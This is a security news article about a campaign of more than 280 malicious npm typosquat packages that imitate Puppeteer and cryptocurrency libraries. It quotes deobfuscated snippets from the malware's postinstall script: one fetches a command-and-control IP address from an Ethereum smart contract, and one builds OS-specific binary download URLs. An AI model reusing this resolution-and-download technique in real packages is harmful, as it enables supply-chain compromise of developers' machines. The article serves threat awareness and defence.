Over 280 malicious typosquat packages have been unearthed in an ongoing campaign targeting JavaScript developers using the popular npm (Node Package Manager) ecosystem.
The attack, which began in late October 2024, is specifically aimed at developers who rely on widely used libraries such as Puppeteer, Bignum.js, and various cryptocurrency libraries, including Ethers.js.
This campaign demonstrates the increasing sophistication of supply chain attacks that exploit the open-source community’s trust.
According to the Phylum Reports, like many such campaigns, this one began stealthily, with a few initial test publications. The first malicious package detected was titled daun124wdsa8, published under npm.
This package presented itself as a legitimate tool by mimicking the metadata of popular libraries. However, upon closer inspection, it contained a suspicious postinstall script.
Protecting Your Networks & Endpoints With UnderDefense MDR – Request Free Demo
This script was designed to execute a JavaScript file (clzypp8j.js) during installation. Fortunately, the attacker made a mistake, as the file they intended to perform was missing from the package, rendering the attack ineffective.
However, the attackers quickly corrected this oversight in subsequent publications. Shortly after, new packages, zalfausi8 and zalf22ausi8, appeared.
These packages contained heavily obfuscated JavaScript designed to download and execute malicious binaries on the victim’s machine.
By the time the community became aware of the threat, the campaign had expanded to include 280+ typosquat packages.
What is a Typosquat Attack?
A typosquat attack is a clever social engineering technique where attackers create malicious packages with names that closely resemble legitimate ones.
For example, in this campaign, the attackers created packages named pupeter and pupetier, which are slight misspellings of the widely-used Puppeteer library.
Developers who mistype the library name might inadvertently install the malicious package, allowing attackers to compromise their systems.
These packages often mimic the versioning of the legitimate package to appear more credible.
In this case, the malicious packages were published under version 23.6.1, which coincides with the most recent release of the legitimate Puppeteer library at the time of the attack.
The core of the attack involves obfuscated JavaScript that runs during the installation of the malicious package.
A key component of the code is its ability to fetch a remote IP address from an Ethereum smart contract.
By interacting with the Ethereum blockchain, attackers hide the IP addresses of their command-and-control servers, making it much harder for security researchers to track and shut them down.
Here’s a breakdown of the deobfuscated code:
const { ethers } = require("ethers");
const abi = ["function getString(address account) public view returns (string)"];
const provider = ethers.getDefaultProvider("mainnet");
const contract = new ethers.Contract('0xa1b40044EBc2794f207D45143Bd82a1B86156c6b', abi, provider);
const fetchAndUpdateIp = async () => {
try {
const ipAddrFromContract = await contract.getString("0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84");
return ipAddrFromContract;
} catch (error) {
console.error("Error fetching IP address:", error);
return await fetchAndUpdateIp();
}
};This code interacts with an Ethereum smart contract to fetch an IP address.
The smart contract stores the IP addresses of the attacker’s servers, allowing the malware to dynamically update its connection points without hardcoding them into the package.
Once the IP address is retrieved, the malware constructs a URL to download a binary file specific to the victim’s operating system.
const getDownloadUrl = hostAddr => {
const platform = os.platform();
switch (platform) {
case 'win32': return hostAddr + "/node-win.exe";
case "linux": return hostAddr + "/node-linux";
case "darwin": return hostAddr + "/node-macos";
default: throw new Error("Unsupported platform: " + platform);
}
};After downloading the appropriate binary, the malware executes it in the background, granting the attacker full control over the compromised system.
Once installed, the malware persists on the system by adding to the startup process, ensuring it runs every time the machine reboots.
Before sending this data back to the attacker’s server, it also collects detailed information about the victim’s machine, including the CPU, GPU, memory, operating system, and username.
This campaign is the latest in a growing wave of supply chain attacks that target developers through open-source ecosystems like npm, PyPI, and others.
In recent years, attackers have increasingly focused on these platforms, knowing that compromising a single package could give them access to thousands of projects and systems.
The attackers in this campaign use typosquat techniques to gain initial access.
Still, the ultimate goal remains the same: gaining control over the victim’s machine to exfiltrate data, deploy ransomware, or conduct further attacks.
Attackers constantly evolve tactics, finding new ways to exploit the trust developers place in open-source repositories.
Run private, Real-time Malware Analysis in both Windows & Linux VMs. Get a 14-day free trial with ANY.RUN!